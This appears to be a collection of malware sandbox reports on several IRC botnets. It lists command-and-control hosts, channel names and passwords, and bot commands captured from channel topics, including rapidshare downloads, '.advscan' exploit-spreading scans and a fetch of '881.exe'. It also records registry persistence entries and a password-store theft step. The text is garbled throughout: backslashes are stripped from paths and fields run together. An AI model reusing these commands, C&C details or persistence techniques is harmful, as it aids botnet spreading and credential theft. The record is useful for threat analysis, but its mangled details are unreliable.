Remote Host Port Number192.168.88.2 80 81 NICK xx[USA|XP]5722214PONG :index.htmlUSER oo oo oo :bbJOIN #.ooo Registry Modifications The following Registry Keys were created:HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONSHKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS000HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMacrovisionsHKEY_CURRENT_USERSoftwareMacrovisionsThe newly created Registry Values are:[HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS000]Service = “Macrovisions”Legacy = 0x00000001ConfigFlags = 0x00000000Class = “LegacyDriver”ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”DeviceDesc = “Macrovisions”[HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_MACROVISIONS]NextInstance = 0x00000001[HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesMacrovisions]DisplayName = “Macrovisions”ImagePath = “??%Temp%71863.sys”Type = 0x00000001Start = 0x00000003 Memory Modifications There was a

iik.for5love.ru(big ruski botnet)

Host Name IP Addressdell-d3e62f7e26 hot.jatajoo.ru URLshttp:// (iik.for5love.ru) (iik.for5love.ru) (iik.for5love.ru) * C&C Server: * Server Password: * Username: SP3-152 * Nickname: [N00_DEU_XP_1314922]_CHAR(0x08)_รค@ * Channel: (Password: ) * Channeltopic: * C&C Server: * Server Password: * Username: SP3-686 * Nickname: [00_DEU_XP_1861146] * Channel: #nit (Password: open) * Channeltopic: :.asc -S|.http http://rapidshare.com/files/314264722/re|.advscan

trbotnet.sytes.net(irc botnet)

Host Name IP Address dell-d3e62f7e26 trbotnet.sytes.net * C&C Server: * Server Password: * Username: rciahpk * Nickname: [DEU|XP|772697] * Channel: #son (Password: botnetim) * Channeltopic: :.msn seen foto? hxxp://www.travestiniz.co.cc/images.php?id= |.msn.email hxxp://www.travestiniz.co.cc/images.php?id= |.p2p |.yims Topic By: [ Load ] botnet) : 154491.207.6.166:3838 chanel=##F## Now talking in ##F##Topic On: [##F## ] [ .asc -S|.http http://rapidshare.com/files/313278869/hus|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile C:start.exe 1 ]Topic By: [ ok ]Modes On: [ ##F## ]

gt10.smo7he.com(mIRC bots hosted in China Beijing Chinanet Jiangsu Province Network)

Host Name IP Address gt10.smo7he.com Opened listening TCP connection on port: 18631 Opened listening TCP connection on port: 113 * C&C Server: * Server Password: * Username: laMer * Nickname: XPMdv4E * Channel: #kwt-team (Password: #191#) * Channeltopic: hosting infos: http://whois.domaintools.com/


Host Name IP Addressana.smo7he.net alkeichah.com UDP ConnectionsRemote IP Address: Port: 1975Send Datagram: packet(s) of size 7Send Datagram: 2 packet(s) of size 3Send Datagram: packet(s) of size 49Send Datagram: packet(s) of size 58Send Datagram: packet(s) of size 1Recv Datagram: 6329 packet(s) of size 0Recv Datagram: packet(s) of size 8Recv Datagram: 2 packet(s)


Remote Host Port Number66.252.5.47 700072.35.84.6 80 * The data identified by the following URL was then requested from the remote web server: o http://alkeichah.com/881.exe NICK jcljatvxJOIN #usb trb50QUIT gettin new bin.NICK dpzgprmiUSER dpzgprmi * 0 :COMPUTERNAMEMODE dpzgprmi +ixUSER jcljatvx * 0 :COMPUTERNAMEMODE jcljatvx +ix Other details * The following port was open in the system:


Remote Host Port Number72.184.196.76 6667 NICK XP|00|USA|SP2|4653USER jddgw 0 0 :XP|00|USA|SP2|4653USERHOST XP|00|USA|SP2|4653MODE XP|00|USA|SP2|4653 +x+iBJOIN #eckoPRIVMSG #ecko :12Password accepted12Type commandlist12[PSTORE]: Starting Pstore.12[PSTORE]: Pstore Started.PONG :1F6819DC Other details * The following ports were open in the system: Port Protocol Process113 TCP msconfig.exe (%System%msconfig.exe)1052 TCP msconfig.exe (%System%msconfig.exe) Registry Modifications * The following Registry Keys were created: o [pathname


Host Name IP Addressdell-d3e62f7e26 * C&C Server: * Server Password: * Username: XP-5750 * Nickname: [DEU|00|P|03462] * Channel: #nuevos# (Password: mariano) * Channeltopic: : Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “winlogin” = winlogin.exeHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTerminal ServerInstallSoftwareMicrosoftWindowsCurrentVersionRun “winlogin” = winlogin.exeHKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:1.exe” = c:1.exe:*:Enabled:winloginHKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active”


bnetnew.helohmar.com connection to remote server: bnetnew.helohmar.com TCP port 8800SMTP: * SMTP: * Username / Password: / SMTP: * SMTP: * Username / Password: / Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “Taskman” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeHKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon “Shell” = explorer.exe,C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Tjmm71” = C:RECYCLERS-1-5-21-0243556031-888888379-781863308-1455mmdg.exeReads HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon